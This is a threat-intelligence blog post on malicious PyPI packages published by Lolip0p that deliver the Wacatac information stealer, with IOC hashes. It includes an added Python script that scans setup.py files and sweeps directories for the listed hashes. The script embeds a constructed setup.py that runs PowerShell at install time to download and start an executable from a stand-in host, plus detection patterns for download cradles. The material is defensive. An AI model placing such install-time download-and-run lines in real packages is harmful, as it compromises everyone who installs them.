The PolySwarm Blog


Malicious Lolip0p PyPI Packages Drop Wacatac

Jan 27, 2023 2:58:20 PM / by The Hivemind

Related Families: Wacatac

Executive Summary

Fortinet recently reported on a software supply chain attack in which threat actors published three malicious PyPI packages that deliver the Wacatac information stealer.

Key Takeaways

  • In a recent supply chain attack, threat actors used three malicious PyPI packages to deliver a malicious payload.
  • All three packages were uploaded by the PyPI user Lolip0p.
  • The payload was Wacatac, an information stealer.

Background

In our recent threat bulletin, PolySwarm's 2023 Analyst Predictions, we predicted that threat actors would continue the software supply chain attack trend, including targeting open-source code repositories. Fortinet recently reported on a supply chain attack in which threat actors published three malicious PyPI packages: ‘colorslib’, ‘httpslib’, and ‘libhttps’. All three were published in early January by a user known as Lolip0p.

Based on their profile information, Lolip0p apparently joined PyPI shortly before publishing the first two packages on January 7th; the third package followed on January 12th. Each package carried a legitimate-looking description, but all three were malicious.

According to researchers at Fortinet, all three packages share an identical setup.py script. When the package is installed, setup.py launches PowerShell with a suspicious URL that downloads a binary, Oxyz.exe. Oxyz.exe drops a second executable, update.exe, which runs from a temp folder and writes multiple files there. One of the dropped files is SearchProtocolHost.exe, a name borrowed from a legitimate Windows Search component; this file is detected as the Wacatac trojan.

What is Wacatac?

Wacatac is an information stealer that gathers multiple types of victim information, including login credentials and banking information. Threat actors can use Wacatac to deploy additional payloads, such as ransomware.

IOCs

PolySwarm has multiple samples associated with this activity.

8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b (Oxyz.exe)

293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757 (Update.exe)
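The two checks a practitioner would want after reading the setup.py description above and the hashes listed here are (1) a static triage of an sdist's setup.py for install-time execution, PowerShell invocation and remote URLs, and (2) a hash sweep of a directory against the SHA-256 IOCs. The following is an added example, not code from the PolySwarm post or from Fortinet. The `SAMPLE_SETUP_PY` text is constructed to imitate the behaviour the post describes; its URL, file layout and the benign file written by `demo_ioc_scan()` are made up, while the package names and hashes are the ones the post lists. The PowerShell pattern list is a heuristic assumption, not a complete detection.

```python
"""Triage helpers for the Lolip0p PyPI campaign: setup.py static scan + IOC hash sweep.

Added example; not code from the PolySwarm post or from Fortinet. The sample
setup.py below is CONSTRUCTED to imitate the described behaviour (setup.py
spawning PowerShell to fetch a binary); its URL is fictitious. Package names
and SHA-256 values are the ones listed in the post.
"""
import ast
import hashlib
import os
import re
import tempfile

KNOWN_BAD_PACKAGES = {"colorslib", "httpslib", "libhttps"}

KNOWN_BAD_SHA256 = {
    "8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b": "Oxyz.exe",
    "293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757": "update.exe",
}

# Calls that execute something while `pip install` builds an sdist.
EXEC_CALLS = {
    ("os", "system"), ("os", "popen"), ("os", "startfile"),
    ("subprocess", "Popen"), ("subprocess", "run"), ("subprocess", "call"),
    ("subprocess", "check_call"), ("subprocess", "check_output"),
}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
# Heuristic (assumption): tokens typical of PowerShell download cradles.
POWERSHELL_RE = re.compile(
    r"powershell|pwsh|invoke-webrequest|downloadfile|downloadstring"
    r"|\biwr\b|\biex\b|-encodedcommand", re.I)

# CONSTRUCTED stand-in for the malicious setup.py; not the real code.
SAMPLE_SETUP_PY = '''
from setuptools import setup
import subprocess

subprocess.Popen(["powershell", "-Command",
                  "Invoke-WebRequest http://malicious.example/Oxyz.exe "
                  "-OutFile Oxyz.exe; Start-Process Oxyz.exe"])

setup(name="colorslib", version="1.0.0", description="Terminal colour helpers")
'''


def _call_name(call: ast.Call):
    """Return (module, attr) for mod.func(...) or (None, name) for name(...)."""
    f = call.func
    if isinstance(f, ast.Attribute) and isinstance(f.value, ast.Name):
        return (f.value.id, f.attr)
    if isinstance(f, ast.Name):
        return (None, f.id)
    return None


def _string_args(call: ast.Call) -> str:
    """Concatenate every string literal that appears inside a call."""
    return " ".join(n.value for n in ast.walk(call)
                    if isinstance(n, ast.Constant) and isinstance(n.value, str))


def scan_setup_py(source: str) -> dict:
    """Static triage: declared package name, known-bad match, and findings."""
    tree = ast.parse(source)
    name, findings = None, []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        cname = _call_name(node)
        if cname == (None, "setup"):
            for kw in node.keywords:
                if kw.arg == "name" and isinstance(kw.value, ast.Constant):
                    name = kw.value.value
        elif cname in EXEC_CALLS or cname in {(None, "exec"), (None, "eval")}:
            label = ".".join(p for p in cname if p)
            findings.append(f"line {node.lineno}: install-time execution via {label}()")
            args = _string_args(node)
            if POWERSHELL_RE.search(args):
                findings.append(f"line {node.lineno}: PowerShell / download cradle in arguments")
            for url in URL_RE.findall(args):
                findings.append(f"line {node.lineno}: remote URL {url}")
    return {"name": name, "known_bad": name in KNOWN_BAD_PACKAGES, "findings": findings}


def sha256_file(path: str) -> str:
    """Stream a file through SHA-256 so large droppers do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def ioc_hits(root: str) -> dict:
    """Map path -> IOC label for every file under root whose SHA-256 is listed."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            label = KNOWN_BAD_SHA256.get(sha256_file(path))
            if label:
                hits[path] = label
    return hits


def demo_ioc_scan() -> dict:
    """Sweep a throwaway directory holding one benign, constructed file."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "SearchProtocolHost.exe"), "wb") as fh:
            fh.write(b"constructed bytes, not the real dropper\n")
        return ioc_hits(tmp)


if __name__ == "__main__":
    report = scan_setup_py(SAMPLE_SETUP_PY)
    print(f"package {report['name']!r}, known bad: {report['known_bad']}")
    for finding in report["findings"]:
        print("  ", finding)
    print("IOC hits in demo directory:", demo_ioc_scan())
```

Run it on the setup.py of a downloaded sdist (`pip download --no-binary :all: <pkg>` then extract) before installing; any install-time execution finding deserves a manual look, and a known-bad name or hash hit should block the install outright.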


You can use the following CLI command to search for all related samples in our portal:

$ polyswarm link list -f Lolip0p




Topics: Threat Bulletin, PyPI, Supply Chain Attack, Lolip0p, Wacatac
